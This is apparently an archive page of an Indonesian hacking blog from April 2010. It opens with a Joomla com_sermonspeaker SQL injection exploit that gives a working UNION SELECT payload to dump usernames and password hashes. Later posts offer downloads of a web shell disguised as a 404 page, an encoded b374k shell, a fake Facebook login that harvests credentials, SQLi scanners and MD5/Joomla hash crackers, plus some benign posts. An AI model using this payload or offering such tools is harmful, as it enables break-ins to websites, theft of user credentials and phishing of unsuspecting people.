Postingan

Menampilkan postingan dari April, 2010

Component com_sermonspeaker SQLi

# Title:Joomla Component com_sermonspeaker SQL Injection Vulnerability

# Author: SadHaCkEr

# Data  : 2010-04-12



[~] Vulnerable  :



http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]



[~] ExploiT         :



-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/



[~] Example         :



http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=

-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

Daftar nama domain seluruh dunia

Gambar
Nama domain adalah nama unik yang diberikan untuk mengidentifikasi nama jaringan komputer ataupun internet. Nama domain berfungsi untuk mempermudah pengguna di internet pada saat melakukan akses ke server, selain juga dipakai untuk mengingat nama server yang dikunjungi tanpa harus mengenal deretan angka yang rumit yang dikenal sebagai IP address.  Nama domain kadang-kadang disebut pula dengan istilah URL, atau alamat website.

Merupakan top level domain yang diberikan untuk mencirikan negara dari internet domain name. Berikut ini adalah daftar Top Level Negara-negara di Dunia yang dikeluarkan oleh Internet Assign Numbers Authority (IANA). IANA adalah salah satu badan independent yang mengatur masalah pengaturan Domain Internet. Saat ini (per tanggal 1 Januari 2002) terdaftar sebanyak 243 Negara yang terdaftar.


A
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia…

404 php shell

Gambar
Php shell ini unik selain tampilannya yang mirip 404 pages shell ini juga diproteksi oleh password. silahkan di download dan dicoba ^ ^ cocok untuk mengelabui admin,,hahahaaa....
use at your own risk....

DOWNLOAD

Script SQLi Scanner

Gambar
Assalamualaikum....
masih diliputi oleh kesedihan aku berusaha tegar menghadapi semuanya,, semoga Allah memberi jalan terbaik untukku.. amin... (hhaaa malah curhat).... ok kali ini saya akan coba share script sqli scanner,, contoh livenya bisa anda pake di web saya r3m1ck.uni.cc , silahkan yang ingin mencoba memasang di web anda download script berikut

DOWNLOAD

tinggal upload di hostingan anda saja.... silahkan di edit,, kalo bisa ya nunut nama aja saya,,wkkwkw

peacceeee.....^ ^
note:
kenapa semua harus terjadi.... ya Allah kuatkanlah hambamu ini.... (jiiaaa curhat lagi,,wkkwwk)

b374k phpshell encoded

Gambar
b374k php shell encoded no log mail safe to use !! ^ ^

DOWNLOAD

Script fake FB

Gambar
Okelah ketemu lagi dengan saya blogger paling ganteng di keluarga saya,,wwkkw.. kali ini saya akan share request dari kang Cole_cole,, dia mintak scriptnya fake login facebook,, OK lets start...
Jadi konsep dasar fake login ini sangat sederhana yaitu menyimpan log user dan passwordnya ke log.txt kemudian meredirect halaman fake ini ke halaman aseli milik facebook...
silahkan download dulu scriptnya

DOWNLOAD

setelah itu ekstrak semua isinya kedalam hostingan anda,,
ubahlah permission untuk log.txt , write.php ke 777 .

selamat mencoba,,

saya ngga bertanggung jawab atas kerusakan yang anda sebabkan dengan script diatas,,

thx...

Tips Mengamankan akun yahoo mail

Gambar
Akhir - akhir ini banyak teman saya yang ribut karena akun FB nya di hack... sek sek sek loh perasaan title artikel ini mengamankan akun yahoo mail deh mas... he eh ,, jd kebanyakan yang dijebol itu akun facebook yang login dengan mail dari yahoo. Ok back to topic, jadi intinya forgot pass di yahoo mail sangatlah mudah jika sang attacker mempunyai cukup lengkap info dari korban. Sebenarnya banyak cara sang attacker bukan hanya lewat forgot password email yang buat login tapi juga dengan keyloger atau dengan fake login. Untuk yang cara dengan keyloger dan fake login kebanyakan cara ini digunakan dalam satu jalur, seperti warnet atau tempat free wifi. Setahu saya transfer data via wifi itu tidak terenkripsi, apa lagi jika si attacker memakai aplikasi sniffing seperti cain abel dll.
Ok disini saya akan share beberapa tips untuk mengamankan akun yahoo anda.

1. Gunakanlah password yg mudah diingat anda namun orang lain tidak gampang menebaknya ,maksud nya anda dapat mengingat password ter…

Pendiri Indowebster dulunya HACKER

Gambar
“Semakin kita berbagi, semakin kita akan mendapatkan sesuatu. Kenapa musti takut berbagi?”

Ia tak tahu pasti sudah berapa ribu server yang telah ia jebol. Sebagai seorang peretas, Juny Maimun memang gemar sekali masuk ke server orang. Bukan untuk mengeruk keuntungan, namun sekadar untuk mempelajari source code aplikasi, atau desain sebuah database.
Itu adalah Juny Maimun yang dulu. Pria yang kerap disapa Acong itu, beberapa tahun lalu memang aktif di komunitas ‘bawah tanah’ AntiHackerlink. Di kalangan peretas, ia dikenal dengan nama nick ‘Bagan’.
Tapi Acong sudah tobat. Ia tak mau lagi merugikan orang lain. Sebagai penganut agama Budha taat, Acong percaya betul dengan Karma. Kini, ia tengah mengembangkan bisnisnya di bidang teknologi informasi yang tengah berkembang pesat.
“Sekarang saya cuma pingin nebus dosa,” kata Acong, saat diwawancara VIVAnews di Gedung Cyber, Jakarta, Rabu 17 Februari 2010. Bahkan, ia justru menyeru rekan-rekan sesama hacker yang salah jalan, untuk insaf kemb…

Script MD5 Crack Part II

Gambar
Kemarin saya sudah share md5 cracker yang cara kerja memakai database/dictionary dari server lain(penyedia layanan md5 crack) Kali ini saya akan share MD5 Cracker yang mana database/dicitonary-nya berada di hosting kita sendiri. Fungsinya agar memudahkan saja dalam cracking md5 hash. Ok silahkan download script dibawah kemudian letakan dalam 1 direktori. Silahkan di edit di utak atik di improve lagi,,hhaaa yang penting arumbiiiaaaa...monggoh...

DOWNLOAD

Script MD5 Crack

Gambar
Ok kali ini saya akan share script md5 crack . Jadi cara kerjanya disini kita menggunakan database dictionary dari situs penyedia layanan md5 crack semacam md5.rednoize.com , passcracking.com dll .
Lumayan lah buat nambah-nambah fitur layanan di situs anda, wkwkkwkwk....
Silahkan download script di bawah ini kemudian upload di hosting situs anda,,
Monggo jika mau di edit silahkan ini open source kok ^ ^ hhaaa

DOWNLOAD

Script Admin Finder

Gambar
Mencari login admin terkadang tinggal menambahkan path admin dibelakang site,, contoh : r3m1ck.uni.cc/admin
. Atau dengan membuka kode html index nya(ctrl+u) cari admin atau bisa juga dengan menambahkan robots.txt dibelakang nama site nya. disini saya akan share scritp admin finder seperti di situs saya http://r3m1ck.uni.cc/adminfinder/ 
Berikut Scriptnya silahkan di download

DOWNLOAD

Joomla Password Cracker

Gambar
Akhirnya sampai Jogja juga....hahay... langsung posting akh... di rumah koneksi busuk banget... T_T,,
Standar enkripsi joomla biasanya berbentuk seperti ini :
b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK
Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua “:”. Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya.
Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla. Sehingga jika di implementasikan melalui enkripsi md5 :
md5(x + salt) = hash
maka :
md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116
so X itu dia password aslinya,, begitu cara kerja joomla passoword crack ini. Jadi rajin-rajin saja nambah dictionary-nya.
untuk penambahan kamus silahkan edit pada bagian in…

Packet Tracer 5.1

Gambar
Packet Tracer 5.1 merupakan program simulasi jaringan berbasis Cisco yang memudahkan orang untuk lebih memahami belajar tentang jaringan. Packet Tracer memberikan simulasi, visualisasi, authoring, penilaian, dan kemampuan kolaborasi dan memfasilitasi mengajar dan belajar dari konsep teknologi jaringan yang kompleks.

Download Packet_Tracer_5.1